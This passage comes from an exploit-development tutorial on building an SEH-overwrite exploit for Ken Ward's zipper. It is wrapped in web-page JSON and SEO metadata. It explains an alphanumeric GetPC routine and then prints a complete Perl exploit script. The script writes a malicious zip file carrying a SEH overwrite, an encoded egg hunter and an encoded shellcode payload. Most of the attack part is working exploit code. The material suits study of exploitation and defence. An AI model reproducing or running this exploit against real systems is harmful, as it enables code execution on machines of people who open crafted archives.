<\/li>\n<\/ul>\n<p>When this GetPC code runs, esi will point to the location directly after the call geteip instruction.<\/p>\n<p>Let's apply the conversion again :<\/p>\n<ul>\n<li>0xeb 0x03 : 0x89 0x03&#160; (as we can see in the compare.txt file, 03 was not changed by the conversion) <\/li>\n<li>0x5e : no conversion <\/li>\n<li>0xff 0xd6 : 0x98 0x99 <\/li>\n<li>0xe8 0xf8 0xff 0xff 0xff&#160; : 0x8a 0x?? 0x98 0x98 <\/li>\n<\/ul>\n<p>We have a little issue here : None of the conversions will produce 0xf8.&#160; So we need to change the code just a little (basically change some offsets and insert &quot;nop&quot; alike instructions) to make things work again.<\/p>\n<p>Take a look at this code :<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\">#alphanum GetPC code\n#written by Peter Van Eeckhoutte\n<span style=\"color: #0000ff\">my<\/span> $getpc =\n&quot;<span style=\"color: #8b0000\">x89x05<\/span>&quot;.   #jmp short (5 bytes) to 'jmp back' at end\n&quot;<span style=\"color: #8b0000\">x5e<\/span>&quot;.       #<span style=\"color: #0000ff\">pop<\/span> esi\n&quot;<span style=\"color: #8b0000\">x41<\/span>&quot;.       #nop (inc ecx)\n&quot;<span style=\"color: #8b0000\">x98x99<\/span>&quot;.   #call esi\n&quot;<span style=\"color: #8b0000\">x41<\/span>&quot;.       #nop (inc ecx)\n&quot;<span style=\"color: #8b0000\">x8ax94x98x98x98<\/span>&quot;;  #jmp back to <span style=\"color: #0000ff\">pop<\/span> esi<\/pre>\n<p>After this code got converted, the end result (at run time) is :<\/p>\n<p><a href=\"\/wp-content\/uploads\/2010\/03\/image32.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px\" title=\"image\" border=\"0\" alt=\"image\" src=\"\/wp-content\/uploads\/2010\/03\/image_thumb63.png\" width=\"482\" height=\"100\" \/><\/a><\/p>\n<p>Ah - that's exactly what we wanted to achieve.&#160; Right after this code has run, ESI will point to the address right after the GetPC routine. So if you put your alpha2 encoded shellcode right after the GetPC code (shellcode encoded with ESI as basereg of course), then we win !<\/p>\n<h3>Putting things together : Ken Ward zipper exploit : improved version<\/h3>\n<p>The payload structure, based on the knowledge we gained in the first article (abysssec.com), will look like this :<\/p>\n<p>[ 1022 bytes to hit SE record] [ nseh ] [ seh ] [ junk ]<\/p>\n<p>where<\/p>\n<p>1022 bytes consist of<\/p>\n<ul>\n<li>filename <\/li>\n<li>lenty of nops&#160; (0x90 gets converted to something else, so we'll use nop-alikes such as 0x41 !) <\/li>\n<li>GetPC code <\/li>\n<li>encoded egg hunter <\/li>\n<li>a few nops <\/li>\n<li>far jump backward (to land in the nops before the GetPC code) <\/li>\n<\/ul>\n<p>at nseh, we will make a short jump back, landing in the nops before the far jump backward<\/p>\n<p>we will overwrite seh with an address from zip4.exe (including null byte)<\/p>\n<p>junk : some nops + double tag (needed for egg hunter) + shellcode<\/p>\n<p>After translating that into perl code, the exploit script will look like this :<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\"># Exploit script for Ken Ward's zipper\n# Taking advantage of payload conversion\n# (improved version)\n# Written by Peter Van Eeckhoutte\n# http:<span style=\"color: #008000\">\/\/www.corelan.be:8800<\/span>\n#---------------------------------------------------\n<span style=\"color: #0000ff\">my<\/span> $sploitfile=&quot;<span style=\"color: #8b0000\">corelan_kenward.zip<\/span>&quot;;\n<span style=\"color: #0000ff\">my<\/span> $ldf_header = &quot;<span style=\"color: #8b0000\">x50x4Bx03x04x14x00x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x00x00x00xB7xACxCEx34x00x00x00<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x00x00x00x00x00x00x00x00<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">xe4x0f<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x00x00x00<\/span>&quot;;\n\n<span style=\"color: #0000ff\">my<\/span> $cdf_header = &quot;<span style=\"color: #8b0000\">x50x4Bx01x02x14x00x14<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x00x00x00x00x00xB7xACxCEx34x00x00x00<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x00x00x00x00x00x00x00x00x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">xe4x0f<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x00x00x00x00x00x00x01x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x24x00x00x00x00x00x00x00<\/span>&quot;;\n\n<span style=\"color: #0000ff\">my<\/span> $eofcdf_header = &quot;<span style=\"color: #8b0000\">x50x4Bx05x06x00x00x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x00x01x00x01x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x12x10x00x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x02x10x00x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x00x00<\/span>&quot;;\n\n<span style=\"color: #0000ff\">print<\/span> &quot;<span style=\"color: #8b0000\">[+] Preparing payloadn<\/span>&quot;;\n\n<span style=\"color: #0000ff\">my<\/span> $size=4064;\n<span style=\"color: #0000ff\">my<\/span> $<span style=\"color: #0000ff\">offset<\/span>=1022;\n#alphanum GetPC code\n#written by Peter Van Eeckhoutte\n<span style=\"color: #0000ff\">my<\/span> $getpc =\n&quot;<span style=\"color: #8b0000\">x89x05<\/span>&quot;.   #jmp short (5 bytes) to 'jmp back' at end\n&quot;<span style=\"color: #8b0000\">x5e<\/span>&quot;.       #<span style=\"color: #0000ff\">pop<\/span> esi\n&quot;<span style=\"color: #8b0000\">x41<\/span>&quot;.       #nop (inc ecx)\n&quot;<span style=\"color: #8b0000\">x98x99<\/span>&quot;.   #call esi\n&quot;<span style=\"color: #8b0000\">x41<\/span>&quot;.       #nop (inc ecx)\n&quot;<span style=\"color: #8b0000\">x8ax94x98x98x98<\/span>&quot;;  #jmp back to <span style=\"color: #0000ff\">pop<\/span> esi\n<span style=\"color: #0000ff\">my<\/span> $filename=  &quot;<span style=\"color: #8b0000\">Admin accounts and passwords.txt<\/span>&quot;.(&quot;<span style=\"color: #8b0000\"> <\/span>&quot; x 100);\n#alpha2 encoded egg hunter - w00t - basereg ESI\n<span style=\"color: #0000ff\">my<\/span> $egghunter=&quot;<span style=\"color: #8b0000\">VYIIIIIIIIIIIIIIII7QZjAXP0A0<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">AkAAQ2AB2BB0BBABXP8ABuJIQvmQ<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">kzKOTOsr2rbJC2pXxM4nUlWupZSD<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">ZOlx0wtpVP1dnkZZLosEyzlosEm7<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">KOM7A<\/span>&quot;;\n<span style=\"color: #0000ff\">my<\/span> $jmpback=&quot;<span style=\"color: #8b0000\">x82x38x98x98x98<\/span>&quot;;  #jump back 200 bytes\n<span style=\"color: #0000ff\">my<\/span> $nops2=&quot;<span style=\"color: #8b0000\">A<\/span>&quot; x 10;\n<span style=\"color: #0000ff\">my<\/span> $nops1=&quot;<span style=\"color: #8b0000\">A<\/span>&quot; x ($<span style=\"color: #0000ff\">offset<\/span>-<span style=\"color: #0000ff\">length<\/span>($filename.$getpc.$egghunter.$nops2.$jmpback));\n<span style=\"color: #0000ff\">my<\/span> $part1 = $filename.$nops1.$getpc.$egghunter.$nops2.$jmpback;\n<span style=\"color: #0000ff\">my<\/span> $nseh=&quot;<span style=\"color: #8b0000\">x89x93x41x41<\/span>&quot;;  #jump back 12 bytes\n<span style=\"color: #0000ff\">my<\/span> $seh=<span style=\"color: #0000ff\">pack<\/span>('V',0x0046AFA3);\n<span style=\"color: #0000ff\">my<\/span> $payload = $part1.$nseh.$seh;\n<span style=\"color: #0000ff\">my<\/span> $shellcode=&quot;<span style=\"color: #8b0000\">w00tw00t<\/span>&quot;.&quot;<span style=\"color: #8b0000\">x89xe2xdaxdcxd9x72xf4x5fx57x59x49x49x49x49<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x43x43x43x43x43x43x51x5ax56x54x58x33x30x56<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x58x34x41x50x30x41x33x48x48x30x41x30x30x41<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x42x41x41x42x54x41x41x51x32x41x42x32x42x42<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x30x42x42x58x50x38x41x43x4ax4ax49x49x49x4a<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x4bx4dx4bx48x59x43x44x46x44x4ax54x46x51x4e<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x32x4ex52x43x4ax50x31x49x59x42x44x4cx4bx44<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x31x46x50x4cx4bx43x46x44x4cx4cx4bx43x46x45<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x4cx4cx4bx47x36x45x58x4cx4bx43x4ex47x50x4c<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x4bx46x56x47x48x50x4fx44x58x44x35x4cx33x50<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x59x45x51x4ex31x4bx4fx4dx31x43x50x4cx4bx42<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x4cx47x54x51x34x4cx4bx47x35x47x4cx4cx4bx46<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x34x44x45x42x58x43x31x4bx5ax4cx4bx51x5ax44<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x58x4cx4bx50x5ax47x50x43x31x4ax4bx4bx53x47<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x47x50x49x4cx4bx47x44x4cx4bx45x51x4ax4ex50<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x31x4bx4fx46x51x4fx30x4bx4cx4ex4cx4bx34x4f<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x30x43x44x44x4ax49x51x48x4fx44x4dx45x51x4f<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x37x4ax49x4ax51x4bx4fx4bx4fx4bx4fx47x4bx43<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x4cx46x44x46x48x44x35x49x4ex4cx4bx50x5ax47<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x54x45x51x4ax4bx45x36x4cx4bx44x4cx50x4bx4c<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x4bx51x4ax45x4cx45x51x4ax4bx4cx4bx45x54x4c<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x4bx45x51x4dx38x4cx49x51x54x46x44x45x4cx43<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x51x49x53x4ex52x43x38x46x49x49x44x4cx49x4a<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x45x4dx59x48x42x42x48x4cx4ex50x4ex44x4ex4a<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x4cx46x32x4bx58x4dx4cx4bx4fx4bx4fx4bx4fx4d<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x59x47x35x44x44x4fx4bx43x4ex48x58x4dx32x44<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x33x4cx47x45x4cx51x34x51x42x4bx58x4cx4bx4b<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x4fx4bx4fx4bx4fx4dx59x47x35x45x58x42x48x42<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x4cx42x4cx47x50x4bx4fx42x48x46x53x50x32x46<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x4ex43x54x45x38x43x45x42x53x45x35x43x42x4b<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x38x51x4cx51x34x45x5ax4cx49x4bx56x50x56x4b<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x4fx50x55x44x44x4bx39x4fx32x46x30x4fx4bx4e<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x48x49x32x50x4dx4fx4cx4dx57x45x4cx51x34x46<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x32x4bx58x51x4ex4bx4fx4bx4fx4bx4fx45x38x42<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x4cx45x31x42x4ex46x38x42x48x51x53x42x4fx42<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x52x45x35x50x31x49x4bx4dx58x51x4cx46x44x44<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x47x4dx59x4dx33x43x58x45x31x42x4ex51x48x51<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x30x43x58x42x4fx44x32x42x45x42x4cx45x38x42<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x42x43x49x47x50x50x43x45x38x42x4ex43x55x45<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x34x51x30x42x48x42x4ex47x50x44x30x43x47x45<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x38x47x50x42x42x43x55x45x35x43x58x43x58x45<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x31x42x56x43x55x42x48x46x39x42x4fx43x45x51<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x30x50x31x4fx39x4cx48x50x4cx47x54x45x4ex4d<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x59x4bx51x50x31x4ex32x50x52x51x43x50x51x46<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x32x4bx4fx48x50x50x31x49x50x50x50x4bx4fx50<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x55x44x48x45x5ax41x41<\/span>&quot;;\n\n<span style=\"color: #0000ff\">my<\/span> $rest = &quot;<span style=\"color: #8b0000\">D<\/span>&quot; x ($size-<span style=\"color: #0000ff\">length<\/span>($payload.$shellcode));\n$payload=$payload.$rest.$shellcode.&quot;<span style=\"color: #8b0000\">.txt<\/span>&quot;;\n\n<span style=\"color: #0000ff\">my<\/span> $evilzip = $ldf_header.$payload.\n              $cdf_header.$payload.\n              $eofcdf_header;\n\n<span style=\"color: #0000ff\">print<\/span> &quot;<span style=\"color: #8b0000\">[+] Removing old zip filen<\/span>&quot;;\n<span style=\"color: #0000ff\">system<\/span>(&quot;<span style=\"color: #8b0000\">del $sploitfile<\/span>&quot;);\n<span style=\"color: #0000ff\">print<\/span> &quot;<span style=\"color: #8b0000\">[+] Writing payload to filen<\/span>&quot;;\n<span style=\"color: #0000ff\">open<\/span>(FILE,&quot;<span style=\"color: #8b0000\">&gt;$sploitfile<\/span>&quot;);\n<span style=\"color: #0000ff\">print<\/span> FILE $evilzip;\n<span style=\"color: #0000ff\">close<\/span>(FILE);\n<span style=\"color: #0000ff\">print<\/span> &quot;<span style=\"color: #8b0000\">[+] Wrote <\/span>&quot;.<span style=\"color: #0000ff\">length<\/span>($evilzip).&quot;<span style=\"color: #8b0000\"> bytes to file $sploitfilen<\/span>&quot;;\n<span style=\"color: #0000ff\">print<\/span> &quot;<span style=\"color: #8b0000\">[+] Payload length : <\/span>&quot; . <span style=\"color: #0000ff\">length<\/span>($payload).&quot;<span style=\"color: #8b0000\">n<\/span>&quot;;<\/pre>\n<p>&#160;<\/p>\n<p>Result : No more complex encoders, register alignment tricks... just a combination of simple logic and compensating for character conversion :<\/p>\n<p><a href=\"\/wp-content\/uploads\/2010\/03\/image33.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px\" title=\"image\" border=\"0\" alt=\"image\" src=\"\/wp-content\/uploads\/2010\/03\/image_thumb64.png\" width=\"462\" height=\"303\" \/><\/a><\/p>\n<p><!--Digiprove_Start--><span lang=\"en\" xml:lang=\"en\" style=\"vertical-align:middle; display:inline; padding:3px; line-height:normal;border:0px;\" title=\"certified 1 October 2010 21:56:23 UTC by Digiprove certificate P51828\" ><a href=\"http:\/\/www.digiprove.com\/show_certificate.aspx?id=P51828;guid=YiM6YfAN8E6g58BkVHqYHg\" target=\"_blank\" rel=\"copyright noopener\" style=\"border:0px; float:none; display:inline; text-decoration: none;\"><img decoding=\"async\" src=\"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png\" style=\"vertical-align:middle; display:inline; border:0px; margin:0px; float:none; background-color:transparent\" border=\"0\" width=\"12px\" height=\"12px\" alt=\"\"\/><span style=\"font-family: Tahoma, MS Sans Serif; font-size:9px; color:#FFFF00; border:0px; float:none; display:inline; text-decoration:none; letter-spacing:normal\" onmouseover=\"this.style.color='#FF3C00';\" onmouseout=\"this.style.color='#FFFF00';\">&nbsp;&nbsp;Copyright secured by Digiprove&nbsp;&copy; 2010 Peter Van Eeckhoutte<\/span><\/a><!--8DAC89776E964FB9F2315E69EBE2026250B66566A5E4676F72B74DEF64325F47--><\/span><!--Digiprove_End--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In the article I wrote on the abysssec.com website, I explained the steps and techniques needed to build a working exploit for Ken Ward's zipper. One of the main difficulties I had to overcome when building the exploit, was the character set limitation.&#160; I basically could only use a subset of the ascii characters (only &hellip; <a href=\"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> \"Exploiting Ken Ward Zipper : Taking advantage of payload conversion\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":true,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[244,245,127],"tags":[3736,2786,2096,1865,1834],"class_list":["post-3530","post","type-post","status-publish","format-standard","hentry","category-exploit-writing-tutorials","category-exploits","category-security","tag-encoder-decoder","tag-egghunter","tag-alphanumeric","tag-seh","tag-shellcode"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Exploiting Ken Ward Zipper : Taking advantage of payload conversion - Corelan | Exploit Development &amp; Vulnerability Research<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploiting Ken Ward Zipper : Taking advantage of payload conversion - Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"og:description\" content=\"In the article I wrote on the abysssec.com website, I explained the steps and techniques needed to build a working exploit for Ken Ward&#039;s zipper. One of the main difficulties I had to overcome when building the exploit, was the character set limitation.&#160; I basically could only use a subset of the ascii characters (only &hellip; Continue reading &quot;Exploiting Ken Ward Zipper : Taking advantage of payload conversion&quot;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/\" \/>\n<meta property=\"og:site_name\" content=\"Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/corelanconsulting\" \/>\n<meta property=\"article:published_time\" content=\"2010-03-27T12:28:49+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png\" \/>\n<meta name=\"author\" content=\"corelanc0d3r\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@corelanc0d3r\" \/>\n<meta name=\"twitter:site\" content=\"@corelanc0d3r\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"TechArticle\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/\"},\"author\":{\"name\":\"corelanc0d3r\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\"},\"headline\":\"Exploiting Ken Ward Zipper : Taking advantage of payload conversion\",\"datePublished\":\"2010-03-27T12:28:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/\"},\"wordCount\":2182,\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.digiprove.com\\\/images\\\/dp_seal_trans_16x16.png\",\"keywords\":[\"encoder decoder\",\"egghunter\",\"alphanumeric\",\"seh\",\"shellcode\"],\"articleSection\":[\"Exploit Writing Tutorials\",\"Exploits\",\"Security\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/\",\"name\":\"Exploiting Ken Ward Zipper : Taking advantage of payload conversion - Corelan | Exploit Development &amp; Vulnerability Research\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.digiprove.com\\\/images\\\/dp_seal_trans_16x16.png\",\"datePublished\":\"2010-03-27T12:28:49+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#primaryimage\",\"url\":\"http:\\\/\\\/www.digiprove.com\\\/images\\\/dp_seal_trans_16x16.png\",\"contentUrl\":\"http:\\\/\\\/www.digiprove.com\\\/images\\\/dp_seal_trans_16x16.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.corelan.be\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Exploiting Ken Ward Zipper : Taking advantage of payload conversion\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"name\":\"Corelan CyberSecurity Research\",\"description\":\"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.corelan.be\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\",\"name\":\"Corelan CyberSecurity Research\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"width\":200,\"height\":200,\"caption\":\"Corelan CyberSecurity Research\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/corelanconsulting\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\",\"https:\\\/\\\/x.com\\\/corelanconsulting\",\"https:\\\/\\\/instagram.com\\\/corelanconsult\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\",\"name\":\"corelanc0d3r\",\"pronouns\":\"he\\\/him\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"caption\":\"corelanc0d3r\"},\"description\":\"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.\",\"sameAs\":[\"https:\\\/\\\/www.corelan-training.com\",\"https:\\\/\\\/instagram.com\\\/corelanc0d3r\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/petervaneeckhoutte\\\/\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\"],\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/author\\\/admin0\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Exploiting Ken Ward Zipper : Taking advantage of payload conversion - Corelan | Exploit Development &amp; Vulnerability Research","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/","og_locale":"en_US","og_type":"article","og_title":"Exploiting Ken Ward Zipper : Taking advantage of payload conversion - Corelan | Exploit Development &amp; Vulnerability Research","og_description":"In the article I wrote on the abysssec.com website, I explained the steps and techniques needed to build a working exploit for Ken Ward's zipper. One of the main difficulties I had to overcome when building the exploit, was the character set limitation.&#160; I basically could only use a subset of the ascii characters (only &hellip; Continue reading \"Exploiting Ken Ward Zipper : Taking advantage of payload conversion\"","og_url":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/","og_site_name":"Corelan | Exploit Development &amp; Vulnerability 